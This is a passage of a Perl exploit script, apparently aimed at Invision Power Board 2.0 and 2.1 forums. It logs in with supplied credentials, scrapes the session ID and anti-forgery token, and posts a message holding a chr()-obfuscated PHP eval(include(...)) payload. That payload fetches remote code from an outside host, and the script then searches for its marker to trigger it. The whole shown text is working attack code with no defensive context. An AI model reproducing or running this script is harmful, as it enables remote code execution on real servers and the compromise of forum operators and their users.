$dir = $opt_d; $login = $opt_l; $password = $opt_p; $forum = $opt_f; $version = $opt_v || 0; $|++; header(); if(!$host||!$dir||!$login||!$password||!$forum) { usage(); } print "[~] SERVER : $host\r\n"; print "[~] PATH : $dir\r\n"; print "[~] LOGIN : $login\r\n"; print "[~] PASSWORD : $password\r\n"; print "[~] TARGET : $version"; print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*')); print "\r\n"; print "[~] Login "; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; $login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $post = 'UserName='.$login.'&PassWord='.$password; $loggedin = 0; print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Connection: close\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-length: ".length($post)."\r\n\r\n"; print $sock "$post"; print $sock "\r\n\r\n"; while (<$sock>) { if(/session_id=([a-f|0-9]{32})/) { $sid = $1; } } $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print $sock "GET ${dir}index.php HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n\r\n"; while (<$sock>) { if(/act=Login&CODE=03/) { $loggedin = 1; last; } } if($loggedin) { print " [ DONE ]\r\n"; } else { print " [ FAILED ]\r\n"; exit(); } print "[+] SID: $sid\r\n"; print "[~] Try get md5_check "; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; if($version==1) { print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n"; } else { print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n"; } print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n\r\n"; while (<$sock>) { if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/) { $md5_check = $1; last; } if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; } } close($sock); if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; } else { print " [ FAILED ]\r\n"; exit(); } print "[~] Create new message "; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; $created = 0; $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47) .chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).c hr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'. '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr( 120).chr(116))); //'; $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0 &CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question =&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0"; print $sock "POST ${dir}index.php HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-length: ".length($post)."\r\n\r\n"; print $sock "$post"; print $sock "\r\n\r\n"; while (<$sock>) { if(/Location:/) { $created = 1; last; } } if($created) { print " [ DONE ]\r\n"; } else { print " [ FAILED ]\r\n"; exit(); } $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[~] Search message "; $post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&s earchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc &search_in=posts&result_type=posts'; print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n";